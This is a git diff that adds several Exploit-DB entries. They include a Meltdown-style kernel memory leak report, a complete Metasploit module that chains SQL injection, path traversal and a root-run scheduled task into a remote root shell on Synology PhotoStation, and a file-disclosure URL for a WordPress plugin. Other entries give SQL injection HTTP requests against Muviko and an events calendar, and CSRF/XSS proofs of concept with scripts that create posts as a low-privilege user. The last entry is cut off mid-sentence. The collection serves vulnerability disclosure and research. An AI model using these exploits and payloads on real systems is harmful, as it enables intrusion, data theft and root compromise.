diff --git a/exploits/hardware/dos/43490.txt b/exploits/hardware/dos/43490.txt
new file mode 100644
index 000000000..667812ade
--- /dev/null
+++ b/exploits/hardware/dos/43490.txt
@@ -0,0 +1,146 @@
+== INTRODUCTION ==
+This is a bug report about a CPU security issue that affects
+processors by Intel, AMD and (to some extent) ARM.
+
+I have written a PoC for this issue that, when executed in userspace
+on an Intel Xeon CPU E5-1650 v3 machine with a modern Linux kernel,
+can leak around 2000 bytes per second from Linux kernel memory after a
+~4-second startup, in a 4GiB address space window, with the ability to
+read from random offsets in that window. The same thing also works on
+an AMD PRO A8-9600 R7 machine, although a bit less reliably and slower.
+
+On the Intel CPU, I also have preliminary results that suggest that it
+may be possible to leak host memory (which would include memory owned
+by other guests) from inside a KVM guest.
+
+The attack doesn't seem to work as well on ARM - perhaps because ARM
+CPUs don't perform as much speculative execution because of a
+different performance-energy-tradeoff or so?
+
+All PoCs are written against specific processors and will likely
+require at least some adjustments before they can run in other
+environments, e.g. because of hardcoded timing tresholds.
+
+############################################################
+
+On the following Intel CPUs (the only ones tested so far), we managed
+to leak information using another variant of this issue ("variant 3").
+So far, we have not managed to leak information this way on AMD or ARM CPUs.
+
+ - Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (in a workstation)
+ - Intel(R) Core(TM) i7-6600U CPU @ 2.60GHz (in a laptop)
+
+Apparently, on Intel CPUs, loads from kernel mappings in ring 3 during
+speculative execution have something like the following behavior:
+
+ - If the address is not mapped (perhaps also under other
+ conditions?), instructions that depend on the load are not executed.
+ - If the address is mapped, but not sufficiently cached, the load loads zeroes.
+ Instructions that depend on the load are executed.
+ Perhaps Intel decided that in case of a sufficiently high-latency load,
+ it makes sense to speculate ahead with a dummy value to get a chance to
+ prefetch cachelines for dependent loads, or something like that?
+ - If the address is sufficiently cached, the load loads the data stored at the
+ given address, without respecting the privilege level.
+ Instructions that depend on the load are executed.
+ This is the vulnerable case.
+
+
+I have attached a PoC that works on both tested Intel systems, named
+intel_kernel_read_poc.tar. Usage:
+
+As root, determine where the core_pattern is in the kernel:
+
+=====
+# grep core_pattern /proc/kallsyms
+ffffffff81e8aea0 D core_pattern
+=====
+
+Then, as a normal user, unpack the PoC and use it to leak the
+core_pattern (and potentially other cached things around it) from
+kernel memory, using the pointer from the previous step:
+
+=====
+$ cat /proc/sys/kernel/core_pattern
+/cores/%E.%p.%s.%t
+$ ./compile.sh && time ./poc_test ffffffff81e8aea0 4096
+ffffffff81e8aea0 2f 63 6f 72 65 73 2f 25 45 2e 25 70 2e 25 73 2e
+|/cores/%E.%p.%s.|
+ffffffff81e8aeb0 25 74 00 61 70 70 6f 72 74 20 25 70 20 25 73 20
+|%t.apport %p %s |
+ffffffff81e8aec0 25 63 20 25 50 00 00 00 00 00 00 00 00 00 00 00 |%c
+%P...........|
+[ zeroes ]
+ffffffff81e8af20 c0 a4 e8 81 ff ff ff ff c0 af e8 81 ff ff ff ff
+|................|
+ffffffff81e8af30 20 8e f0 81 ff ff ff ff 75 d9 cd 81 ff ff ff ff |
+.......u.......|
+[ zeroes ]
+ffffffff81e8bb60 65 5b cf 81 ff ff ff ff 00 00 00 00 00 00 00 00
+|e[..............|
+ffffffff81e8bb70 00 00 00 00 6d 41 00 00 00 00 00 00 00 00 00 00
+|....mA..........|
+[ zeroes ]
+
+real 0m13.726s
+user 0m9.820s
+sys 0m3.908s
+=====
+
+As you can see, the core_pattern, part of the previous core_pattern (behind the
+first nullbyte) and a few kernel pointers were leaked.
+
+To confirm whether other leaked kernel data was leaked correctly, use gdb as
+root to read kernel memory:
+
+=====
+# gdb /bin/sleep /proc/kcore
+[...]
+(gdb) x/4gx 0xffffffff81e8af20
+0xffffffff81e8af20: 0xffffffff81e8a4c0 0xffffffff81e8afc0
+0xffffffff81e8af30: 0xffffffff81f08e20 0xffffffff81cdd975
+(gdb) x/4gx 0xffffffff81e8bb60
+0xffffffff81e8bb60: 0xffffffff81cf5b65 0x0000000000000000
+0xffffffff81e8bb70: 0x0000416d00000000 0x0000000000000000
+=====
+
+Note that the PoC will report uncached bytes as zeroes.
+
+
+To Intel:
+Please tell me if you have trouble reproducing this issue.
+Given how different my two test machines are, I would be surprised if this
+didn't just work out of the box on other CPUs from the same generation.
+This PoC doesn't have hardcoded timings or anything like that.
+
+We have not yet tested whether this still works after a TLB flush.
+
+
+Regarding possible mitigations:
+
+A short while ago, Daniel Gruss presented KAISER:
+https://gruss.cc/files/kaiser.pdf
+https://lkml.org/lkml/2017/5/4/220 (cached:
+https://webcache.googleusercontent.com/search?q=cache:Vys_INYdkOMJ:https://lkml.org/lkml/2017/5/4/220+&cd=1&hl=en&ct=clnk&gl=ch
+)
+https://github.com/IAIK/KAISER
+
+Basically, the issue that KAISER tries to mitigate is that on Intel
+CPUs, the timing of a pagefault reveals whether the address is
+unmapped or mapped as kernel-only (because for an unmapped address, a
+pagetable walk has to occur while for a mapped address, the TLB can be
+used). KAISER duplicates the top-level pagetables of all processes and
+switches them on kernel entry and exit. The kernel's top-level
+pagetable looks as before. In the top-level pagetable used while
+executing userspace code, most entries that are only used by the
+kernel are zeroed out, except for the kernel text and stack that are
+necessary to execute the syscall/exception entry code that has to
+switch back the pagetable.
+
+I suspect that this approach might also be usable for mitigating
+variant 3, but I don't know how much TLB flushing / data cache
+flushing would be necessary to make it work.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43490.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/43474.rb b/exploits/php/webapps/43474.rb
new file mode 100755
index 000000000..cfb55a80c
--- /dev/null
+++ b/exploits/php/webapps/43474.rb
@@ -0,0 +1,365 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Synology PhotoStation Multiple Vulnerabilities",
+ 'Description' => %q{
+ This module exploits multiple vulnerabilities in Synology PhotoStation.
+ When combined these issues can be leveraged to gain a remote root shell.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'James Bercegay',
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://gulftech.org/' ]
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [ ['Automatic', {}] ],
+ 'DisclosureDate' => '2018-01-08',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('DSMPORT', [ true, "The default DSM port", '5000']),
+ ])
+ end
+
+ def check
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; SELECT user; -- "
+ },
+ })
+
+ if res and res.body =~ /PhotoStation/
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+
+ rnum = rand(1000)
+ rstr = Rex::Text.rand_text_alpha(10)
+
+ uuid = rnum # User ID
+ upwd = rstr # User Password
+ uusr = rstr # User name
+
+ vol1 = '/volume1'
+ audb = '/usr/syno/etc/private/session/current.users'
+
+###########################################################################
+# STEP 00: Force PhotoStation to NOT use DSM for the authentication system
+###########################################################################
+
+ print_status("Switching authentication system to PhotoStation via SQL Injection")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; UPDATE photo_config SET config_value=0 WHERE config_key='account_system'; -- "
+ },
+ })
+
+###########################################################################
+# STEP 01: Create an admin user
+###########################################################################
+
+ print_status("Creating admin user: #{uusr} => #{upwd}")
+
+ # Password hash
+ umd5 = Rex::Text.md5(upwd)
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; INSERT INTO photo_user (userid, username, password, admin) VALUES (#{uuid}, '#{uusr}', '#{umd5}', TRUE); -- "
+ },
+ })
+
+###########################################################################
+# STEP 02: Authenticate and store session identifier
+###########################################################################
+
+ print_status("Authenticating as admin user: #{uusr}")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/webapi/auth.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'api' =>'SYNO.PhotoStation.Auth',
+ 'method' => 'login',
+ 'version' =>'1',
+ 'username' => uusr,
+ 'password' => upwd,
+ 'enable_syno_token' => 'TRUE',
+
+ },
+ })
+
+ if not res or not res.headers or not res.headers['Set-Cookie']
+ print_error("Unable to retrieve session identifier! Aborting ...")
+ return
+ end
+
+ uckv = res.headers['Set-Cookie']
+ psid = /PHPSESSID=([a-z0-9]+);/.match(uckv)[1]
+
+ print_status("Got PHP Session ID: #{psid}")
+
+###########################################################################
+# STEP 03: Delete any existing path names used from the database
+###########################################################################
+
+ print_status("Making sure there are no duplicate path index conflicts ...")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; DELETE FROM video WHERE path='#{audb}'; -- "
+ },
+ })
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; DELETE FROM video WHERE path='#{vol1}/photo///current.users'; -- "
+ },
+ })
+
+###########################################################################
+# STEP 04: Create a record for our malicious path in the database
+###########################################################################
+
+ print_status("Creating video record with bad 'path' data via SQL injection")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/blog/label.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'get_article_label',
+ 'article_id' => "1; INSERT INTO video (id, path, title, container_type) VALUES (#{rnum}, '#{audb}', '#{rstr}', '#{rstr}'); -- "
+ },
+ })
+
+###########################################################################
+# STEP 05: Copy session database as root, to the web directory for reading
+###########################################################################
+
+ print_status("Making a copy of the session db as root via synophotoio")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/photo/album_util.php',
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'action' =>'copy_items',
+ 'destination' => '2f',
+ 'video_list' => rnum
+ },
+ 'cookie' => uckv
+ })
+
+###########################################################################
+# STEP 06: Move the session db copy to the web root for retrieval
+###########################################################################
+
+ print_status("Moving session db to webroot for retrieval")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/photo/include/file_upload.php',
+ 'method' => 'POST',
+ 'vars_get' =>
+ {
+ # /../@appstore/PhotoStation/photo/
+ 'dir' =>'2f2e2e2f4061707073746f72652f50686f746f53746174696f6e2f70686f746f2f',
+ 'name' => "2f",
+ 'fname' => "#{rstr}",
+ 'sid' => "#{psid}",
+ 'action' => 'aviary_add',
+ },
+ 'vars_post' =>
+ {
+ 'url' => 'file://' + vol1 + '/photo/current.users'
+ },
+ 'cookie' => uckv
+ })
+
+###########################################################################
+# STEP 07: Retrieve and read the session db
+###########################################################################
+
+ print_status("Attempting to read session db")
+
+ res = send_request_cgi(
+ {
+ 'uri' => "/photo/#{rstr}.jpg",
+ 'method' => 'GET'
+ })
+
+ if not res or not res.body
+ print_error("Unable to retrieve session file! Aborting ...")
+ return
+ end
+
+ host = /"host": "([^"]+)"/.match(res.body)[1]
+ sess = /"id": "([^"]+)"/.match(res.body)[1]
+ syno = /"synotoken": "([^"]+)"/.match(res.body)[1]
+
+ print_status("Extracted admin session: #{sess} @ #{host}")
+
+###########################################################################
+# STEP 08: Registering files for cleanup
+###########################################################################
+
+ # Uncomment for cleanup functionality
+ # register_files_for_cleanup("#{vol1}/photo/current.users")
+ # register_files_for_cleanup("#{vol1}/@appstore/PhotoStation/photo/#{rstr}.jpg")
+
+###########################################################################
+# STEP 09: Create a task containing our payload
+###########################################################################
+
+ print_status("Creating privileged task to run as root")
+
+ # Switch to DSM port from here on out
+ datastore['RPORT'] = datastore['DSMPORT']
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/webapi/entry.cgi',
+ 'headers' =>
+ {
+ 'X-SYNO-TOKEN' => syno,
+ 'Client-IP' => host
+ },
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'name' => '"whatevs"',
+ 'owner' => '"root"',
+ 'enable' => 'true',
+ 'schedule' =>'{"date_type":0,"week_day":"0,1,2,3,4,5,6","hour":0,"minute":0,"repeat_hour":0,"repeat_min":0,"last_work_hour":0,"repeat_min_store_config":[1,5,10,15,20,30],"repeat_hour_store_config":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]}',
+ 'extra' => '{"notify_enable":false,"script":"' + payload.encoded.gsub(/"/,'\"') + '","notify_mail":"","notify_if_error":false}',
+ 'type' => '"script"',
+ 'api' => 'SYNO.Core.TaskScheduler',
+ 'method' => 'create',
+ 'version' => '2',
+
+ },
+ 'cookie' => "id=#{sess}"
+ })
+
+ if not res or not res.body
+ print_error("Unable to create task! Aborting ...")
+ return
+ end
+
+ task = /{"id"\d+)},"success":true}/.match(res.body)[1]
+
+ print_status("Task created successfully: ID => #{task}")
+
+###########################################################################
+# STEP 10: Execute the selected payload
+###########################################################################
+
+ print_status("Running selected task as root. Get ready for shell!")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/webapi/entry.cgi',
+ 'headers' =>
+ {
+ 'X-SYNO-TOKEN' => syno,
+ 'Client-IP' => host
+ },
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'stop_when_error' => 'false',
+ 'mode' => '"sequential"',
+ 'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"run","version":1,"task":[' + task + ']}]',
+ 'api' => 'SYNO.Entry.Request',
+ 'method' => 'request',
+ 'version' => '1'
+ },
+ 'cookie' => "id=#{sess}"
+ })
+
+###########################################################################
+# STEP 11: Delete payload task from scheduler
+###########################################################################
+
+ print_status("Deleting malicious task from task scheduler")
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/webapi/entry.cgi',
+ 'headers' =>
+ {
+ 'X-SYNO-TOKEN' => syno,
+ 'Client-IP' => host
+ },
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'stop_when_error' => 'false',
+ 'mode' => '"sequential"',
+ 'compound' => '[{"api":"SYNO.Core.TaskScheduler","method":"delete","version":1,"task":[' + task + ']}]',
+ 'api' => 'SYNO.Entry.Request',
+ 'method' => 'request',
+ 'version' => '1'
+ },
+ 'cookie' => "id=#{sess}"
+ })
+
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/43475.txt b/exploits/php/webapps/43475.txt
new file mode 100644
index 000000000..90ccf531d
--- /dev/null
+++ b/exploits/php/webapps/43475.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Worpress Plugin Service Finder Booking < 3.2 - Local File Disclosure
+# Google Dork: N/A
+# Date: 09/01/2018 (GMT+7)
+# Exploit Author: telahdihapus
+# Vendor Homepage: https://themeforest.net/user/aonetheme
+# Software Link: https://themeforest.net/item/service-finder-service-and-business-listing-wordpress-theme/15208793
+# Tested on: windows 10
+
+1. description :
+unauthenticated user can access downloads.php, and can disclosure file in server through downloads.php, using method get on 'file=', user/attacker also can disclosure wp-config, or else file
+
+2. POC :
+http://victim.com/wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
+
+3. timeline
+- jan 1, 2018 report vendor
+- jan 1, 2018 vendor send email
+- jan 1, 2018 send poc
+- jan 2, 2018 vendor contact team
+- jan 8, 2018 vendor send email about fixed issue
+
+4. solution :
+update to version 3.2
\ No newline at end of file
diff --git a/exploits/php/webapps/43477.txt b/exploits/php/webapps/43477.txt
new file mode 100644
index 000000000..911313f2d
--- /dev/null
+++ b/exploits/php/webapps/43477.txt
@@ -0,0 +1,148 @@
+# Exploit Title: Muviko 1.1 - Multiple SQL Injection
+# Exploit Author: Ahmad Mahfouz
+# Contact: http://twitter.com/eln1x
+# Date: 09/01/2018
+# CVE: CVE-2017-17970
+# Vendor Homepage: https://www.muvikoscript.com
+# Version: 1.1
+# Tested on: Mac OS
+
+
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection: login.php form parameter [POST] email
+
+
+
+POST /login.php HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+Upgrade-Insecure-Requests: 1
+
+Content-Type: application/x-www-form-urlencoded
+
+Content-Length: 45
+
+
+
+email=admin@dmin.com'%2b(select*from(select(sleep(20)))a)%2b'&password=admxn&login=
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection: load_season.php form parameter [GET] season_id
+
+
+
+GET /themes/flixer/ajax/load_season.php?season_id=-19'+union+all+select+1,2,3,4,5,6,7,8,9--+-&season_number=1 HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+
+
+# SQL Injection get_raring.php parameter [GET] movie_id
+
+
+
+GET /themes/flixer/ajax/get_rating.php?movie_id=9'+AND+SLEEP(5)+AND+'AAA'='AAA HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection update_rating.php parameters [GET] rating,movie_id
+
+
+
+GET /themes/flixer/ajax/update_rating.php?movie_id=[SQL]&rating=[SQL] HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
+
+
+
+--------------------------------------------------------------------------------------------------------
+
+# SQL Injection set_player_source.php parameters [GET] id
+
+GET /themes/flixer/ajax/set_player_source.php?id=[SQL]&is_series=1&is_embed=0 HTTP/1.1
+
+Host: localhost
+
+User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
+
+Accept: */*
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+X-Requested-With: XMLHttpRequest
+
+Cookie: PHPSESSID=rrnaq7ssxxxxx9g6b7jd7415
+
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/43479.txt b/exploits/php/webapps/43479.txt
new file mode 100644
index 000000000..58909fae3
--- /dev/null
+++ b/exploits/php/webapps/43479.txt
@@ -0,0 +1,53 @@
+# Exploit Title: Wichipi Events Calendar - SQL Injection
+# Date: 09-01-2018
+# Exploit Author: Dennis Veninga
+# Contact Author: d.veninga [at] networking4all.com
+# Vendor Homepage: codecanyon.net/user/wachipi
+# Version: 1.0
+# CVE-ID: CVE-2018-5315
+
+Events Calendar allows you to easily add to your website a powerful
+interactive calendar to present your events.
+
+Found 09-01-18
+Vendor reply & fix 09-01-2018
+
+The Wachipi WP Events Calendar plugin 1.0 for WordPress has SQL Injection
+via the event_id parameter to event.php.
+
+NOTE: this plugin is NOT related to the Modern Tribe Events Calendar plugin.
+
+[Additional Information]
+http://
+{TARGET}/event.php?event_id=-123%20union%20all%20select%201,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
+
+[Vulnerability Type]
+SQL Injection
+
+[Vendor of Product]
+https://codecanyon.net/item/wp-events-calendar-plugin/5025660 Wachipi
+
+[Affected Product Code Base]
+Events Calendar - 1.0
+
+[Affected Component]
+events.php
+
+[Attack Type]
+Remote
+
+[Impact Code execution]
+true
+
+[Impact Escalation of Privileges]
+true
+
+[Impact Information Disclosure]
+true
+
+[Attack Vectors]
+To exploit, union select 29 columns. User can use 2 or 25 for information
+gathering.
+
+[Discoverer]
+Dennis Veninga @ Networking4all.com
\ No newline at end of file
diff --git a/exploits/php/webapps/43484.txt b/exploits/php/webapps/43484.txt
new file mode 100644
index 000000000..5764c034a
--- /dev/null
+++ b/exploits/php/webapps/43484.txt
@@ -0,0 +1,74 @@
+* Exploit Title: Social Media Widget by Acurax [CSRF]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://www.acurax.com/
+* Software Link: https://wordpress.org/plugins/acurax-social-media-widget
+* Version: 3.2.5
+* Tested on: WordPress 4.9.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements AJAX action `acx_asmw_saveorder` which calls back the
+function `acx_asmw_saveorder_callback`. The later does not implement any
+anti-CSRF controls thus allowing a malicious actor to perform an attack
+that could update plugin specific option `social_widget_icon_array_order`.
+
+Vulnerable param is `$_POST['recordsArray']` and it is saved as an
+option with the name `social_widget_icon_array_order`.
+
+Leveraging a CSRF could lead to a Persistent XSS (see PoC). Payload will
+be served when a user with the right privileges visits plugin's settings
+page (`wp-admin/admin.php?page=Acurax-Social-Widget-Settings`).
+
+Vulnerable code is located in file
+`acurax-social-media-widget/function.php` line 993:
+
+```
+function acx_asmw_saveorder_callback() {
+ global $wpdb;
+ $social_widget_icon_array_order = $_POST['recordsArray'];
+ if ( current_user_can( 'manage_options' ) ) {
+ $social_widget_icon_array_order = serialize(
+$social_widget_icon_array_order );
+ update_option( 'social_widget_icon_array_order',
+$social_widget_icon_array_order );
+ echo "
";
+ echo "Social Media Icon's Order Saved";
+ echo "
";
+ }
+ die(); // this is required to return a proper result
+}
+
+add_action( 'wp_ajax_acx_asmw_saveorder', 'acx_asmw_saveorder_callback' );
+
+```
+
+PoC
+---
+
+In this PoC we leverage the CSRF vulnerabilityt o perform a Persistent
+XSS attack. The payload is available in plugin's settings.
+
+```
+
+
+```
+
+Timeline
+--------
+
+1. **2017-12-12**: Discovered
+2. **2017-12-12**: Tried to contact plugin's vendor through the contact
+form on their website
+3. **2017-12-12**: Vendor replied
+4. **2017-12-12**: Vendor Received Details
+5. **2018-01-02**: Patch released
\ No newline at end of file
diff --git a/exploits/php/webapps/43485.txt b/exploits/php/webapps/43485.txt
new file mode 100644
index 000000000..24997d419
--- /dev/null
+++ b/exploits/php/webapps/43485.txt
@@ -0,0 +1,109 @@
+* Exploit Title: CMS Tree Page View [CSRF, Privilege Escalation]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://eskapism.se/
+* Software Link: https://wordpress.org/plugins/cms-tree-page-view
+* Version: 1.4
+* Tested on: WordPress 4.8.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements AJAX action `cms_tpv_add_page` which calls back the
+function `cms_tpv_add_page`. The later does not implement any anti-CSRF
+controls or security checks.
+
+Leveraging a CSRF attack an attacker could perform a Persistent XSS
+attack if the victim has administrative rights (see PoC).
+
+The AJAX action is a privileged one so it's only available for
+registered users. Even so it doesn't implement any capabilities checks
+so it's available to all users no matter the access level. This could
+allow any registered user to create arbitrary posts no matter the access
+level.
+
+PoC
+---
+
+### CSRF -> Persistent XSS
+
+In this PoC we exploit the `$_POST["page_titles"]` param to perform a
+Persistent XSS attack.
+
+```
+
+
+```
+
+### Create Arbitrary Posts
+
+In this PoC we use a user with subscriber access to create arbitrary
+pages. The post\_type is user defined so in the same manner we could
+create any post type.
+
+```
+#!/usr/bin/env php
+
+ * @date 2017-08-09
+ ******************************************************************************/
+
+require_once __DIR__ . '/vendor/autoload.php';
+
+use Wordfence\ExKit\Cli;
+use Wordfence\ExKit\Config;
+use Wordfence\ExKit\Endpoint;
+use Wordfence\ExKit\ExitCodes;
+use Wordfence\ExKit\WPAuthentication;
+
+Config::get( 'url.base', null, true, 'Enter the site URL' )
+|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
+
+$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
+
+Cli::writeInfo( 'Logging in as subscriber...' );
+
+WPAuthentication::logInAsUserRole( $s,
+WPAuthentication::USER_ROLE_SUBSCRIBER );
+
+Cli::writeInfo( 'Sending payload...' );
+
+$postData = [
+ 'action' => 'cms_tpv_add_page',
+ 'type' => 'after',
+ 'pageID' => '1',
+ 'post_type' => 'page',
+ 'page_title' => date('Y-m-d H:i:s'),
+];
+
+$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
+
+if(!$r->success || $r->body == '0'){
+ ExitCodes::exitWithFailed('Failed to retrieve a valid response');
+}
+
+ExitCodes::exitWithSuccess('Exploitation successful');
+
+```
+
+Timeline
+--------
+
+1. **2017-12-12**: Discovered
+2. **2017-12-23**: Vendor notified by email
+3. **2018-01-06**: Patch released
\ No newline at end of file
diff --git a/exploits/php/webapps/43486.txt b/exploits/php/webapps/43486.txt
new file mode 100644
index 000000000..10db3a002
--- /dev/null
+++ b/exploits/php/webapps/43486.txt
@@ -0,0 +1,117 @@
+* Exploit Title: Admin Menu Tree Page View [CSRF, Privilege Escalation]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://eskapism.se/
+* Software Link: https://wordpress.org/plugins/admin-menu-tree-page-view
+* Version: 2.6.9
+* Tested on: WordPress 4.9.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements AJAX action `admin_menu_tree_page_view_add_page` which
+calls back the function `admin_menu_tree_page_view_add_page`. The later
+does not implement any anti-CSRF controls or security checks.
+
+Leveraging a CSRF attack an attacker could perform a Persistent XSS
+attack if the victim has administrative rights (see PoC).
+
+The AJAX action is a privileged one so it's only available for
+registered users. Even so it doesn't implement any capabilities checks
+so it's available to all users no matter the access level. This could
+allow any registered user to create arbitrary posts no matter the access
+level.
+
+PoC
+---
+
+### CSRF -> Persistent XSS
+
+In this PoC we exploit the `$_POST["page_titles"]` param to perform a
+Persistent XSS attack.
+
+```
+
+
+```
+
+### Create Arbitrary Posts
+
+In this PoC we use a user with subscriber access to create arbitrary
+pages. The post\_type is user defined so in the same manner we could
+create any post type.
+
+```
+#!/usr/bin/env php
+
+ * @date 2017-08-09
+ ******************************************************************************/
+
+require_once __DIR__ . '/vendor/autoload.php';
+
+use Wordfence\ExKit\Cli;
+use Wordfence\ExKit\Config;
+use Wordfence\ExKit\Endpoint;
+use Wordfence\ExKit\ExitCodes;
+use Wordfence\ExKit\WPAuthentication;
+
+Config::get( 'url.base', null, true, 'Enter the site URL' )
+|| ExitCodes::exitWithFailedPrecondition( 'You must enter a valid URL' );
+
+$s = new \Wordfence\ExKit\Session( null, [], [], [ 'timeout' => 60 ] );
+$s->XDebugOn();
+
+Cli::writeInfo( 'Logging in as subscriber...' );
+
+WPAuthentication::logInAsUserRole( $s,
+WPAuthentication::USER_ROLE_SUBSCRIBER );
+
+Cli::writeInfo( 'Sending payload...' );
+
+$postData = [
+ 'action' => 'admin_menu_tree_page_view_add_page',
+ 'type' => 'after',
+ 'pageID' => '1',
+ 'post_type' => 'page',
+ 'page_titles' => [ '' ],
+ 'post_status' => 'publish',
+];
+
+$r = $s->post( Endpoint::adminAjaxURL(), [], $postData);
+
+if(!$r->success || !$r->body == '0'){
+ ExitCodes::exitWithFailed('Failed to retrieve a valid response');
+}
+
+ExitCodes::exitWithSuccess('Exploitation successful');
+
+```
+
+Timeline
+--------
+
+1. **2017-12-12**: Discovered
+2. **2017-12-12**: Tried to contact plugin author through WordPress.org
+support threads
+3. **2017-12-13**: Tried to contact plugin author by creating an issue
+in plugin's repository on Github
+4. **2017-12-13**: Vendor replied
+5. **2017-12-14**: Vendor received details
+6. **2018-01-07**: Patch released
\ No newline at end of file
diff --git a/exploits/php/webapps/43487.txt b/exploits/php/webapps/43487.txt
new file mode 100644
index 000000000..f978feca8
--- /dev/null
+++ b/exploits/php/webapps/43487.txt
@@ -0,0 +1,57 @@
+* Exploit Title: WordPress Download Manager [CSRF]
+* Discovery Date: 2017-12-12
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: https://www.wpdownloadmanager.com/
+* Software Link: https://wordpress.org/plugins/download-manager
+* Version: 2.9.60
+* Tested on: WordPress 4.9.1
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+Plugin implements the AJAX action `wpdm-install-addon` which calls the
+function `wpdm_install_addon`. This function doesn't take any anti-CSRF
+measures thus making it susceptible to those kind of attacks.
+
+What is interesting about this function though, is the fact that it
+provides plugin installation functionality for admin users. The origin of
